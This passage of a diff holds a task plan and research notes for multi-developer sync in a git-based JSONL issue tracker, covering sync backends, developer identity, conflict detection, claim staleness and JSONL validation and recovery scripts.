+Wave 1 (foundational, parallel):  Tasks 1, 2, 3
+Wave 2 (core logic, parallel):    Tasks 4, 5       (depends on Wave 1)
+Wave 3 (integration, sequential): Tasks 6, 7       (depends on Wave 2)
+Wave 4 (gates, sequential):       Task 8            (depends on Wave 3)
+Wave 5 (docs):                    Task 9            (depends on Wave 4)
+```
+
+---
+
+## Wave 1: Foundations (parallel — no interdependencies)
+
+### Task 1: Sync branch auto-detection utility
+File(s): `scripts/sync-utils.sh`
+What to implement: Shell function `get_sync_branch()` that returns the correct sync branch using 3-method fallback: (1) `.beads/config.json` `sync_branch` field or `BD_SYNC_BRANCH` env var, (2) `git symbolic-ref refs/remotes/origin/HEAD`, (3) `git remote show origin | grep 'HEAD branch'`, (4) try `main`, then `master`. Also `get_sync_remote()` with config override and `upstream` detection for forks.
+TDD steps:
+  1. Write test: `tests/sync-utils.test.sh` — assert fallback chain returns correct branch for each scenario (config set, env set, symbolic-ref works, remote show works, neither works)
+  2. Run test: confirm it fails (script doesn't exist)
+  3. Implement: `scripts/sync-utils.sh` with `get_sync_branch` and `get_sync_remote` functions
+  4. Run test: confirm it passes
+  5. Commit: `test: add sync branch detection tests` then `feat: implement sync branch auto-detection`
+Expected output: `get_sync_branch` returns correct branch name in all fallback scenarios
+
+### Task 2: Session identity utility
+File(s): `scripts/sync-utils.sh`
+What to implement: Shell function `get_session_identity()` that returns `$(git config user.email)@$(hostname -s)` format. Validate against `^[a-zA-Z0-9._@+-]+$` regex (OWASP A03). Fallback to `git config user.name` if email not set. Cross-platform: use `hostname -s` (portable across Linux/macOS/Windows Git Bash).
+TDD steps:
+  1. Write test: `tests/sync-utils.test.sh` — assert identity format, assert injection strings rejected, assert fallback when email missing
+  2. Run test: confirm it fails
+  3. Implement: `get_session_identity` in `scripts/sync-utils.sh`
+  4. Run test: confirm it passes
+  5. Commit: `test: add session identity tests` then `feat: implement session identity utility`
+Expected output: Valid identity string like `harsha@Harsha-OFC`
+
+### Task 3: File index JSONL schema and read/write helpers
+File(s): `scripts/file-index.sh`
+What to implement: Shell functions to manage `.beads/file-index.jsonl`:
+- `file_index_add <issue_id> <developer> <files_json> <modules_json>` — append entry with `updated_at` timestamp
+- `file_index_remove <issue_id>` — append tombstone entry for issue
+- `file_index_read` — read all entries, resolve LWW per issue_id, output active entries as JSON
+- `file_index_get <issue_id>` — get single issue's file entry
+Uses `jq` for JSON handling. Reuses `sanitize()` pattern from `dep-guard.sh`.
+TDD steps:
+  1. Write test: `tests/file-index.test.sh` — assert add creates valid JSONL, remove tombstones, read resolves LWW, injection inputs sanitized
+  2. Run test: confirm it fails
+  3. Implement: `scripts/file-index.sh`
+  4. Run test: confirm it passes
+  5. Commit: `test: add file index JSONL tests` then `feat: implement file index read/write helpers`
+Expected output: JSONL entries with `{issue_id, developer, files, modules, updated_at, tombstone}` schema
+
+---
+
+## Wave 2: Core Logic (parallel — depends on Wave 1)
+
+### Task 4: Conflict detection script
+File(s): `scripts/conflict-detect.sh`
+What to implement: Main conflict detection script:
+- `conflict-detect.sh --issue <id>` — check for overlaps between given issue's files/modules and all other in-progress issues in file index
+- `conflict-detect.sh --files <file1,file2>` — check arbitrary file list against index
+- `--detail` flag: drill down from module-level to file-level, use grep for function-level hints
+- Exit codes: 0 = no conflicts, 1 = conflicts found
+- Stale sync warning: check last sync timestamp, warn if >15 min
+- Output format: developer identity, issue ID, overlapping modules/files
+- Reuses: `sanitize()` from dep-guard, `get_session_identity()` from sync-utils, `file_index_read()` from file-index
+TDD steps:
+  1. Write test: `tests/conflict-detect.test.sh` — assert: overlap found (exit 1), no overlap (exit 0), detail flag shows files, stale warning shown, injection inputs rejected
+  2. Run test: confirm it fails
+  3. Implement: `scripts/conflict-detect.sh`
+  4. Run test: confirm it passes
+  5. Commit: `test: add conflict detection tests` then `feat: implement conflict detection script`
+Expected output: Module-level overlap warnings with developer identity and issue references
+
+### Task 5: File index auto-update on issue state changes
+File(s): `scripts/file-index.sh` (extend)
+What to implement: Function `file_index_update_from_tasks <issue_id> <task_file_path>` that:
+- Parses task file for `File(s):` lines, extracts file paths
+- Derives modules from directory paths (e.g., `src/lib/status.ts` -> `src/lib/`)
+- Calls `file_index_add` with extracted data
+- Called when: issue goes in_progress (from task list), task completed (refine), issue closed (tombstone)
+- Edge case: no task file — fall back to issue description keyword matching, flag `confidence: "low"`
+TDD steps:
+  1. Write test: `tests/file-index.test.sh` (extend) — assert: task file parsed correctly, modules derived, no-task-file fallback works, closed issue tombstoned
+  2. Run test: confirm it fails
+  3. Implement: `file_index_update_from_tasks` in `scripts/file-index.sh`
+  4. Run test: confirm it passes
+  5. Commit: `test: add file index task parsing tests` then `feat: implement file index auto-update from task files`
+Expected output: File index populated from task list `File(s):` entries
+
+---
+
+## Wave 3: Integration (sequential — depends on Wave 2)
+
+### Task 6: Extend smart-status.sh for cross-developer visibility
+File(s): `scripts/smart-status.sh`
+What to implement: Extend existing Tier 1/2 conflict detection (lines 311-482) to include cross-developer data:
+- After local worktree conflict checks, read file index for OTHER developers' in-progress issues
+- Group by developer identity, show module-level overlaps
+- Add "Team Activity" section to status output: who is working on what, module overlap warnings
+- Show staleness: "harsha@laptop claimed forge-abc 3 days ago, no commits since"
+- Source sync-utils.sh for identity, file-index.sh for index reads
+TDD steps:
+  1. Write test: `tests/smart-status.test.sh` (extend or create) — assert: cross-dev section appears, overlap warning format correct, staleness shown for old claims
+  2. Run test: confirm it fails
+  3. Implement: extend smart-status.sh with cross-dev section
+  4. Run test: confirm it passes
+  5. Commit: `test: add cross-dev status tests` then `feat: extend smart-status for cross-developer visibility`
+Expected output: `/status` shows "Team Activity" with developer-grouped issues and overlap warnings
+
+### Task 7: Auto-sync at Forge command entry
+File(s): `scripts/sync-utils.sh` (extend), `.claude/commands/plan.md`, `.claude/commands/dev.md`, `.claude/commands/status.md`
+What to implement: Function `auto_sync()` in sync-utils.sh that:
+- Runs `bd sync` targeting the correct sync branch (from `get_sync_branch`)
+- On failure: warn "sync failed, working with local data (last sync: <timestamp>)", continue
+- Records last sync timestamp to `.beads/.last-sync`
+- Update Forge commands (plan, dev, status) to call `bash scripts/sync-utils.sh auto-sync` at entry
+- After sync, auto-update file index from all in-progress issues' task files
+TDD steps:
+  1. Write test: `tests/sync-utils.test.sh` (extend) — assert: sync records timestamp, failure is non-blocking, stale detection works
+  2. Run test: confirm it fails
+  3. Implement: `auto_sync` in sync-utils.sh, update command files
+  4. Run test: confirm it passes
+  5. Commit: `test: add auto-sync tests` then `feat: implement auto-sync at Forge command entry`
+Expected output: Every Forge command starts with fresh beads state, graceful offline handling
+
+---
+
+## Wave 4: Gate Integration (sequential — depends on Wave 3)
+
+### Task 8: Soft block gates on /plan and /dev entry
+File(s): `.claude/commands/plan.md`, `.claude/commands/dev.md`
+What to implement: After the existing HARD-GATE (worktree isolation), add a soft-block gate:
+- Run `bash scripts/conflict-detect.sh --issue <beads-id>`
+- If exit code 1 (conflicts found): display conflicts, prompt "Conflicts detected with other developers. Proceed anyway? (y/n)"
+- `n` → exit cleanly, no side effects
+- `y` → log override decision via `bd comments add <id> "Conflict override: proceeding despite overlap with <other-issues>"`, continue
+- If exit code 0: proceed silently
+- Audit: record conflict overrides per OWASP A09
+TDD steps:
+  1. Write test: `tests/conflict-detect.test.sh` (extend) — assert: exit code 1 triggers prompt text, exit code 0 has no prompt, override logged
+  2. Run test: confirm it fails
+  3. Implement: add soft-block gate sections to plan.md and dev.md
+  4. Run test: confirm it passes
+  5. Commit: `test: add soft block gate tests` then `feat: add conflict soft-block gates to /plan and /dev`
+Expected output: Developers warned before entering conflicting work areas
+
+---
+
+## Wave 5: Documentation (depends on Wave 4)
+
+### Task 9: Sync commands after command file edits
+File(s): (run script only)
+What to implement: Run `node scripts/sync-commands.js` to propagate command changes to all 7 agent directories. Verify with `--check`.
+TDD steps:
+  1. Run: `node scripts/sync-commands.js --check` — confirm no drift
+  2. If drift: run `node scripts/sync-commands.js` to fix
+  3. Commit: `chore: sync command files across agent directories`
+Expected output: All agent directories have updated plan.md and dev.md

--- a/docs/plans/2026-03-22-multi-dev-awareness-tasks.md
+++ b/docs/plans/2026-03-22-multi-dev-awareness-tasks.md
@@ -7,29 +7,47 @@
 ## Parallel Wave Structure
 
 ```
-Wave 1 (foundational, parallel):  Tasks 1, 2, 3
-Wave 2 (core logic, parallel):    Tasks 4, 5       (depends on Wave 1)
-Wave 3 (integration, sequential): Tasks 6, 7       (depends on Wave 2)
-Wave 4 (gates, sequential):       Task 8            (depends on Wave 3)
-Wave 5 (docs):                    Task 9            (depends on Wave 4)
+Wave 1 (foundational, parallel):  Tasks 1, 2, 3, 4
+Wave 2 (core logic, parallel):    Tasks 5, 6       (depends on Wave 1)
+Wave 3 (integration, sequential): Tasks 7, 8       (depends on Wave 2)
+Wave 4 (gates, sequential):       Task 9            (depends on Wave 3)
+Wave 5 (docs):                    Task 10           (depends on Wave 4)
 ```
 
 ---
 
 ## Wave 1: Foundations (parallel — no interdependencies)
 
-### Task 1: Sync branch auto-detection utility
+### Task 1: Pluggable sync backend abstraction
 File(s): `scripts/sync-utils.sh`
-What to implement: Shell function `get_sync_branch()` that returns the correct sync branch using 3-method fallback: (1) `.beads/config.json` `sync_branch` field or `BD_SYNC_BRANCH` env var, (2) `git symbolic-ref refs/remotes/origin/HEAD`, (3) `git remote show origin | grep 'HEAD branch'`, (4) try `main`, then `master`. Also `get_sync_remote()` with config override and `upstream` detection for forks.
+What to implement: Sync backend system with three strategies, configured via `.beads/config.json` `sync_backend` field:
+- `refs` (default): Uses `refs/beads/*` custom hidden refs. Push/pull via `git push origin refs/beads/*` and `git fetch origin refs/beads/*:refs/beads/*`. Invisible to developers (no branches, no PR noise, no git log). JSONL merge via `cat | sort | uniq` on conflict. Auto-fallback to `inline` if remote rejects custom refs.
+- `branch`: Dedicated `beads/sync` branch. Push/pull `.beads/` files to/from this branch. Auto-created on first sync if missing.
+- `inline`: Sync `.beads/` on the code branch (master/develop). Current behavior, zero config.
+- Function `sync_push()` and `sync_pull()` abstract the backend. `bd sync` calls these.
+- Function `get_sync_config()` reads `.beads/config.json` with defaults.
 TDD steps:
-  1. Write test: `tests/sync-utils.test.sh` — assert fallback chain returns correct branch for each scenario (config set, env set, symbolic-ref works, remote show works, neither works)
+  1. Write test: `tests/sync-utils.test.sh` — assert: config reading with defaults, backend selection, fallback from refs to inline on failure
   2. Run test: confirm it fails (script doesn't exist)
-  3. Implement: `scripts/sync-utils.sh` with `get_sync_branch` and `get_sync_remote` functions
+  3. Implement: `scripts/sync-utils.sh` with sync backend abstraction
   4. Run test: confirm it passes
-  5. Commit: `test: add sync branch detection tests` then `feat: implement sync branch auto-detection`
-Expected output: `get_sync_branch` returns correct branch name in all fallback scenarios
+  5. Commit: `test: add sync backend tests` then `feat: implement pluggable sync backend`
+Expected output: `sync_pull`/`sync_push` work transparently across all three backends
 
-### Task 2: Session identity utility
+### Task 2: Sync branch/remote detection utility
+File(s): `scripts/sync-utils.sh` (extend)
+What to implement: Functions for `branch` and `inline` backends:
+- `get_sync_branch()`: fallback chain — config > env (`BD_SYNC_BRANCH`) > `git symbolic-ref refs/remotes/origin/HEAD` > `git remote show origin` > try `main` > `master`
+- `get_sync_remote()`: config > env > detect `upstream` remote for forks > default `origin`
+TDD steps:
+  1. Write test: `tests/sync-utils.test.sh` (extend) — assert fallback chain returns correct branch/remote for each scenario
+  2. Run test: confirm it fails
+  3. Implement: `get_sync_branch` and `get_sync_remote` in `scripts/sync-utils.sh`
+  4. Run test: confirm it passes
+  5. Commit: `test: add branch detection tests` then `feat: implement sync branch/remote detection`
+Expected output: Correct branch/remote returned for git flow, trunk-based, fork-based setups
+
+### Task 3: Session identity utility
 File(s): `scripts/sync-utils.sh`
 What to implement: Shell function `get_session_identity()` that returns `$(git config user.email)@$(hostname -s)` format. Validate against `^[a-zA-Z0-9._@+-]+$` regex (OWASP A03). Fallback to `git config user.name` if email not set. Cross-platform: use `hostname -s` (portable across Linux/macOS/Windows Git Bash).
 TDD steps:
@@ -40,7 +58,7 @@ TDD steps:
   5. Commit: `test: add session identity tests` then `feat: implement session identity utility`
 Expected output: Valid identity string like `harsha@Harsha-OFC`
 
-### Task 3: File index JSONL schema and read/write helpers
+### Task 4: File index JSONL schema and read/write helpers
 File(s): `scripts/file-index.sh`
 What to implement: Shell functions to manage `.beads/file-index.jsonl`:
 - `file_index_add <issue_id> <developer> <files_json> <modules_json>` — append entry with `updated_at` timestamp
@@ -60,7 +78,7 @@ Expected output: JSONL entries with `{issue_id, developer, files, modules, updat
 
 ## Wave 2: Core Logic (parallel — depends on Wave 1)
 
-### Task 4: Conflict detection script
+### Task 5: Conflict detection script
 File(s): `scripts/conflict-detect.sh`
 What to implement: Main conflict detection script:
 - `conflict-detect.sh --issue <id>` — check for overlaps between given issue's files/modules and all other in-progress issues in file index
@@ -78,7 +96,7 @@ TDD steps:
   5. Commit: `test: add conflict detection tests` then `feat: implement conflict detection script`
 Expected output: Module-level overlap warnings with developer identity and issue references
 
-### Task 5: File index auto-update on issue state changes
+### Task 6: File index auto-update on issue state changes
 File(s): `scripts/file-index.sh` (extend)
 What to implement: Function `file_index_update_from_tasks <issue_id> <task_file_path>` that:
 - Parses task file for `File(s):` lines, extracts file paths
@@ -98,7 +116,7 @@ Expected output: File index populated from task list `File(s):` entries
 
 ## Wave 3: Integration (sequential — depends on Wave 2)
 
-### Task 6: Extend smart-status.sh for cross-developer visibility
+### Task 7: Extend smart-status.sh for cross-developer visibility
 File(s): `scripts/smart-status.sh`
 What to implement: Extend existing Tier 1/2 conflict detection (lines 311-482) to include cross-developer data:
 - After local worktree conflict checks, read file index for OTHER developers' in-progress issues
@@ -114,7 +132,7 @@ TDD steps:
   5. Commit: `test: add cross-dev status tests` then `feat: extend smart-status for cross-developer visibility`
 Expected output: `/status` shows "Team Activity" with developer-grouped issues and overlap warnings
 
-### Task 7: Auto-sync at Forge command entry
+### Task 8: Auto-sync at Forge command entry
 File(s): `scripts/sync-utils.sh` (extend), `.claude/commands/plan.md`, `.claude/commands/dev.md`, `.claude/commands/status.md`
 What to implement: Function `auto_sync()` in sync-utils.sh that:
 - Runs `bd sync` targeting the correct sync branch (from `get_sync_branch`)
@@ -134,7 +152,7 @@ Expected output: Every Forge command starts with fresh beads state, graceful off
 
 ## Wave 4: Gate Integration (sequential — depends on Wave 3)
 
-### Task 8: Soft block gates on /plan and /dev entry
+### Task 9: Soft block gates on /plan and /dev entry
 File(s): `.claude/commands/plan.md`, `.claude/commands/dev.md`
 What to implement: After the existing HARD-GATE (worktree isolation), add a soft-block gate:
 - Run `bash scripts/conflict-detect.sh --issue <beads-id>`
@@ -155,7 +173,7 @@ Expected output: Developers warned before entering conflicting work areas
 
 ## Wave 5: Documentation (depends on Wave 4)
 
-### Task 9: Sync commands after command file edits
+### Task 10: Sync commands after command file edits
 File(s): (run script only)
 What to implement: Run `node scripts/sync-commands.js` to propagate command changes to all 7 agent directories. Verify with `--check`.
 TDD steps:

--- a/docs/plans/2026-03-22-multi-dev-sync-edge-cases-research.md
+++ b/docs/plans/2026-03-22-multi-dev-sync-edge-cases-research.md
@@ -1,0 +1,602 @@
+# Multi-Developer Sync Edge Cases — Research Findings
+
+**Date**: 2026-03-22
+**Purpose**: Concrete solutions for 8 edge cases in git-based JSONL issue tracking sync
+**Constraints**: Git-native, bash scripts, no external services, offline-capable
+
+---
+
+## 1. Concurrent JSONL Sync Race Conditions
+
+### Problem
+Two developers run `bd sync` simultaneously, both modify `.beads/issues.jsonl`. Git merge fails on same-line edits.
+
+### Recommended Solution: Custom Git Merge Driver + Per-Line Deduplication
+
+**Concrete approach**: Register a custom git merge driver in `.gitattributes` that treats JSONL as a **set file** (each line is an independent record, order irrelevant, dedup by unique key).
+
+```gitattributes
+# .gitattributes
+.beads/issues.jsonl merge=jsonl-set
+.beads/file-index.jsonl merge=jsonl-set
+```
+
+```gitconfig
+# .gitconfig (or repo .git/config)
+[merge "jsonl-set"]
+  name = JSONL set-based merge (dedup by ID)
+  driver = scripts/git-merge-jsonl %O %A %B %L
+```
+
+**The merge driver script** (`scripts/git-merge-jsonl`):
+1. Read all three files (ancestor `%O`, ours `%A`, theirs `%B`)
+2. Parse each line as JSON, extract the unique key (e.g., `id` field)
+3. For lines that exist in only one side: include them (append-only additions)
+4. For lines modified on both sides (same `id`, different content): **last-writer-wins** using an embedded `updated_at` timestamp field
+5. Write the merged result back to `%A` (git convention)
+6. Exit 0 (success) or 1 (unresolvable conflict)
+
+**Why this is best**:
+- Zero-config for developers — git handles it transparently during pull/merge
+- Works offline — no server needed
+- Proven pattern: a3nm's blog documents this exact approach for log/set files, used in production for years
+- Git's built-in `union` merge strategy is a simpler fallback (appends both sides, may create duplicates) but a custom driver with dedup-by-ID is more robust
+
+**Alternative considered — CRDTs**: Overkill for this use case. CRDTs add 16-32 bytes metadata per entry and require a CRDT library. Our JSONL entries already have unique IDs and timestamps, which is sufficient for last-writer-wins resolution.
+
+**Alternative considered — Per-developer files**: Each dev writes to `.beads/issues-{devid}.jsonl`. Eliminates conflicts entirely but complicates reads (must merge N files) and queries. Good fallback if the merge driver proves insufficient at scale.
+
+**Real-world examples**:
+- [a3nm's git-merge-set](https://a3nm.net/blog/git_auto_conflicts.html) — custom merge driver for set/log files
+- [git-json-merge](https://github.com/jonatanpedersen/git-json-merge) — xdiff-based JSON merge driver
+- [Beadbox/Dolt](https://beadbox.app) — cell-level three-way merge for issue tracking
+- Git's built-in `merge=union` strategy in `.gitattributes`
+
+**Complexity**: Moderate (custom merge driver script ~50-80 lines of bash/node)
+
+---
+
+## 2. TOCTOU in Conflict Detection
+
+### Problem
+Dev A checks for conflicts (clean), starts working. Dev B claims same module 5 seconds later. By commit time, Dev A's check is stale.
+
+### Recommended Solution: Optimistic Concurrency Control with Re-validation at Commit
+
+**Concrete approach**: Embed a **version vector** (or simple monotonic counter) per issue/claim in the JSONL. At commit time, re-validate:
+
+```
+1. Developer runs `bd claim <issue-id>`
+2. Script does: git pull --rebase (get latest state)
+3. Check if issue is already claimed → if yes, abort with message
+4. Write claim with: { claimed_by, claimed_at, version: current_version + 1 }
+5. git add + git commit + git push
+6. If push fails (someone else pushed): git pull --rebase, re-check claim
+7. If claim was taken during rebase: abort and notify developer
+8. If clean: push succeeds, claim is atomic
+```
+
+**The key insight**: Git push is already an atomic compare-and-swap at the ref level. If the remote ref has moved since your last fetch, push fails. This is exactly optimistic concurrency control — git itself is the concurrency primitive.
+
+**Additional safeguard — pre-commit hook**:
+```bash
+# .lefthook/pre-commit/check-beads-conflicts.sh
+# Re-fetch and verify no conflicts before allowing commit
+git fetch origin --quiet
+# Compare local .beads/ state with origin
+if git diff origin/master -- .beads/issues.jsonl | grep -q "claimed_by"; then
+  echo "WARNING: .beads/ state has changed on remote. Run 'bd sync' first."
+fi
+```
+
+**Why this is best**:
+- Uses git's built-in atomicity — no external locking service needed
+- Optimistic approach means no blocking — devs work freely, conflicts detected only at push time
+- Wikipedia's OCC article confirms: "Before committing, each transaction verifies that no other transaction has modified the data it has read. If conflicting modifications found, the committing transaction rolls back and can be restarted."
+- Works offline — checks happen at sync time, not during work
+
+**Real-world examples**:
+- Git itself uses OCC — push fails if remote has diverged
+- Elasticsearch uses `_seq_no` + `_primary_term` for optimistic concurrency
+- DynamoDB uses version numbers for optimistic locking
+
+**Complexity**: Trivial (git push already does this; add a wrapper script ~20 lines)
+
+---
+
+## 3. Orphaned Claims / Session Crashes
+
+### Problem
+Claude Code session claims an issue, laptop crashes. Claim never released. Other devs see it as "claimed" indefinitely.
+
+### Recommended Solution: Timestamp-Based Staleness with Configurable TTL
+
+**Concrete approach**: Every claim includes a `claimed_at` ISO timestamp. A configurable TTL (default: 2 hours) determines staleness. No heartbeat needed.
+
+```
+Claim record:
+{
+  "id": "beads-42",
+  "claimed_by": "harsha@laptop",
+  "claimed_at": "2026-03-22T10:30:00Z",
+  "ttl_minutes": 120
+}
+
+Staleness check (in bd sync / bd status):
+  current_time - claimed_at > ttl_minutes → mark as stale
+  Stale claims shown with warning: "Claimed by harsha@laptop 3h ago (STALE)"
+  Any developer can reclaim stale issues: `bd claim --force <issue-id>`
+```
+
+**Optional enhancement — activity-based freshness**: Instead of (or in addition to) a fixed TTL, check git log for recent commits by the claiming developer on files related to the issue. If the developer has committed in the last N minutes, the claim is "active" regardless of TTL.
+
+```bash
+# Check if claimer has recent activity
+last_commit=$(git log -1 --format=%ct --author="$claimer" -- "$related_files")
+now=$(date +%s)
+idle_seconds=$((now - last_commit))
+if [ $idle_seconds -lt $((ttl_minutes * 60)) ]; then
+  echo "Claim is active (last commit ${idle_seconds}s ago)"
+fi
+```
+
+**Why this is best**:
+- No server, no heartbeat daemon, no background process
+- Works offline — staleness is evaluated at read time by whoever queries
+- Simple to understand and debug
+- Martin Fowler's "HeartBeat" pattern acknowledges that for non-real-time systems, periodic checking (pull-based) is simpler than continuous heartbeats (push-based)
+- Consul/HashiCorp uses session TTLs for exactly this purpose in their distributed lock system
+
+**Real-world examples**:
+- Consul sessions: TTL-based invalidation for distributed locks
+- Redis locks: `SET key value EX ttl NX` — expire-based lock release
+- Git LFS file locking: advisory locks with server-side staleness detection
+
+**Complexity**: Trivial (timestamp comparison, ~15 lines of bash)
+
+---
+
+## 4. Large Team Scale (10-15 Concurrent Sessions)
+
+### Problem
+File index grows large, sync becomes slow, conflict detection has too many false positives at module level.
+
+### Recommended Solution: Hierarchical Module Granularity + Index Partitioning
+
+**Concrete approach — three-tier strategy**:
+
+#### A. Finer-grained conflict zones (reduce false positives)
+Instead of module-level conflict detection (e.g., "src/commands/"), use **file-level** tracking:
+
+```jsonl
+{"file":"src/commands/plan.ts","claimed_by":"dev-a","claimed_at":"..."}
+{"file":"src/commands/dev.ts","claimed_by":"dev-b","claimed_at":"..."}
+```
+
+Two developers working on different files in the same directory no longer conflict.
+
+#### B. Index partitioning (reduce sync size)
+Split the monolithic `file-index.jsonl` into per-directory index files:
+
+```
+.beads/
+  issues.jsonl           # All issues (small, rarely conflicts)
+  file-index/
+    src-commands.jsonl    # File claims for src/commands/
+    src-lib.jsonl         # File claims for src/lib/
+    tests.jsonl           # File claims for tests/
+```
+
+Benefits:
+- Git merges operate on smaller files
+- Developers working on unrelated areas never touch the same index file
+- Custom merge driver handles each partition independently
+
+#### C. Periodic compaction (keep index lean)
+```bash
+# bd gc — garbage collect completed/stale claims
+# Remove claims older than 7 days with status=completed
+# Remove stale claims older than 24 hours
+jq -c 'select(.status != "completed" or (now - (.completed_at | fromdateiso8601) < 604800))' \
+  .beads/file-index.jsonl > .beads/file-index.jsonl.tmp
+mv .beads/file-index.jsonl.tmp .beads/file-index.jsonl
+```
+
+**Why Bloom filters are NOT recommended**: Bloom filters are probabilistic — they have false positives by design. For conflict detection, false positives mean "you might have a conflict when you don't," which is the exact problem we're trying to reduce. Deterministic file-level tracking is better.
+
+**Why this is best**:
+- File-level granularity eliminates most false positives
+- Partitioning keeps individual files small
+- Compaction prevents unbounded growth
+- All git-native, no external services
+
+**Real-world examples**:
+- Salesforce CI/CD tools use file-level change tracking to avoid conflicts
+- Large monorepos (Google, Meta) use path-based ownership (CODEOWNERS) for conflict prevention
+
+**Complexity**: Moderate (partitioning logic ~100 lines; compaction ~30 lines)
+
+---
+
+## 5. Cross-Platform Hostname/Identity Issues
+
+### Problem
+`hostname -s` behaves differently across Windows Git Bash, WSL, macOS, and Linux. Identity format inconsistencies break claim matching.
+
+### Recommended Solution: Use `git config user.name` + Normalized Machine ID
+
+**Concrete approach**: Don't use hostname at all for identity. Use git's own identity system plus a stable machine fingerprint:
+
+```bash
+get_developer_identity() {
+  # Primary: git user identity (consistent across platforms)
+  local git_user
+  git_user=$(git config user.name 2>/dev/null || echo "unknown")
+
+  # Secondary: stable machine ID (for multi-session disambiguation)
+  local machine_id
+  case "${OSTYPE:-$(uname -s | tr '[:upper:]' '[:lower:]')}" in
+    linux*|linux-gnu*)
+      # Linux: use machine-id (stable across reboots)
+      machine_id=$(cat /etc/machine-id 2>/dev/null | head -c 8)
+      ;;
+    darwin*)
+      # macOS: use hardware UUID
+      machine_id=$(ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/{print $4}' | head -c 8)
+      ;;
+    msys*|mingw*|cygwin*)
+      # Windows Git Bash: use COMPUTERNAME (always set)
+      machine_id=$(echo "${COMPUTERNAME:-$(hostname)}" | tr '[:upper:]' '[:lower:]' | head -c 8)
+      ;;
+    *)
+      # WSL or unknown: check for WSL first
+      if grep -qi microsoft /proc/version 2>/dev/null; then
+        machine_id=$(cat /etc/machine-id 2>/dev/null | head -c 8)
+      else
+        machine_id=$(hostname | tr '[:upper:]' '[:lower:]' | head -c 8)
+      fi
+      ;;
+  esac
+
+  # Session ID: PID of the parent shell (disambiguates multiple sessions)
+  local session_id="$$"
+
+  echo "${git_user}@${machine_id}:${session_id}"
+}
+# Output example: "harsha@a1b2c3d4:12345"
+```
+
+**Why this is best**:
+- `git config user.name` is the one identity guaranteed to exist in any git environment
+- `$OSTYPE` is a bash built-in (no subprocess, fastest check) — neofetch project recommends this over `$(uname)`
+- `COMPUTERNAME` is always set on Windows (even in Git Bash/MSYS2)
+- `/etc/machine-id` is standardized on systemd Linux systems (stable across reboots)
+- Session PID disambiguates multiple parallel sessions on the same machine
+- Truncated to 8 chars for readability
+
+**Why NOT hostname**: `hostname -s` is not POSIX. On Windows Git Bash it returns the MSYS hostname, not the Windows hostname. On some Docker containers, hostname is random. On WSL, it may return the Windows hostname or the WSL hostname depending on WSL version.
+
+**Real-world examples**:
+- Neofetch uses `$OSTYPE` for OS detection (GitHub issue #433)
+- Git's own `config.mak.uname` uses `uname -s` with case matching for build system
+- systemd's `/etc/machine-id` is the standard stable machine identifier on Linux
+
+**Complexity**: Trivial (identity function ~25 lines, called once per session)
+
+---
+
+## 6. Network Partitions / Partial Sync
+
+### Problem
+Dev syncs, network drops mid-transfer. JSONL file is truncated or corrupted.
+
+### Recommended Solution: Line-Level Validation + Atomic Write Pattern
+
+**Concrete approach — three layers of defense**:
+
+#### A. Post-sync JSONL validation
+After every `git pull`, validate the JSONL file line by line:
+
+```bash
+validate_jsonl() {
+  local file="$1"
+  local line_num=0
+  local errors=0
+  while IFS= read -r line; do
+    line_num=$((line_num + 1))
+    if [ -z "$line" ]; then continue; fi  # skip blank lines
+    if ! echo "$line" | jq empty 2>/dev/null; then
+      echo "ERROR: Invalid JSON at line $line_num: $line"
+      errors=$((errors + 1))
+    fi
+  done < "$file"
+  return $errors
+}
+```
+
+#### B. Truncation detection
+Check for common truncation indicators:
+```bash
+detect_truncation() {
+  local file="$1"
+  # Check 1: File ends with incomplete JSON (no closing brace)
+  local last_char
+  last_char=$(tail -c 1 "$file")
+  if [ "$last_char" != "}" ] && [ "$last_char" != $'\n' ]; then
+    echo "WARNING: File may be truncated (last char: '$last_char')"
+    return 1
+  fi
+  # Check 2: Last line is valid JSON
+  local last_line
+  last_line=$(tail -1 "$file")
+  if ! echo "$last_line" | jq empty 2>/dev/null; then
+    echo "WARNING: Last line is invalid JSON — likely truncated"
+    return 1
+  fi
+  return 0
+}
+```
+
+#### C. Recovery strategy
+```bash
+recover_jsonl() {
+  local file="$1"
+  # Strategy 1: Remove only the corrupted last line (truncation)
+  local total_lines
+  total_lines=$(wc -l < "$file")
+  head -n $((total_lines - 1)) "$file" > "${file}.recovered"
+  if validate_jsonl "${file}.recovered"; then
+    mv "${file}.recovered" "$file"
+    echo "Recovered: removed truncated last line"
+    return 0
+  fi
+  # Strategy 2: Keep only valid lines
+  local tmp="${file}.clean"
+  > "$tmp"
+  while IFS= read -r line; do
+    if echo "$line" | jq empty 2>/dev/null; then
+      echo "$line" >> "$tmp"
+    fi
+  done < "$file"
+  mv "$tmp" "$file"
+  echo "Recovered: kept $(wc -l < "$file") valid lines, discarded corrupted"
+}
+```
+
+**Why this is best**:
+- JSONL's line-per-record format is inherently resilient — corruption affects at most one record
+- Git itself provides protection: `git fsck` detects object corruption, and partial transfers leave the repo in a consistent state (git uses atomic ref updates)
+- The real risk is not git corruption (git handles this) but application-level write interruption during `bd sync`'s JSONL manipulation
+- Validation is cheap (jq per line) and can run as a post-merge hook
+
+**Additional safeguard — git post-merge hook**:
+```bash
+# .git/hooks/post-merge
+for f in .beads/*.jsonl; do
+  if ! validate_jsonl "$f"; then
+    echo "WARNING: $f has invalid lines after merge. Run 'bd repair' to fix."
+  fi
+done
+```
+
+**Real-world examples**:
+- Apache Kafka uses segment-based logs with CRC checksums per record
+- SQLite uses write-ahead logs with checksums for crash recovery
+- JSONL validators (jsonltools.com) validate line-by-line
+
+**Complexity**: Moderate (validation ~30 lines, recovery ~40 lines, hook setup ~10 lines)
+
+---
+
+## 7. Branch Protection vs Beads Sync
+
+### Problem
+Repos with strict branch protection (require PR, require reviews) prevent `bd sync` from pushing directly to the protected branch.
+
+### Recommended Solution: Dedicated `beads/sync` Branch + GitHub App Bypass (Two Options)
+
+#### Option A: Dedicated sync branch (simplest, works everywhere)
+
+```bash
+# bd sync uses a dedicated unprotected branch
+BEADS_SYNC_BRANCH="beads/sync"
+
+bd_sync() {
+  # Push beads changes to dedicated branch
+  git push origin HEAD:refs/heads/$BEADS_SYNC_BRANCH
+
+  # On the receiving end, developers pull from this branch:
+  git fetch origin $BEADS_SYNC_BRANCH
+  git checkout origin/$BEADS_SYNC_BRANCH -- .beads/
+}
+```
+
+The `beads/sync` branch is never protected — it only contains .beads/ metadata. Developers fetch from it to get the latest issue state.
+
+#### Option B: GitHub Rulesets with path-based bypass (GitHub-specific)
+
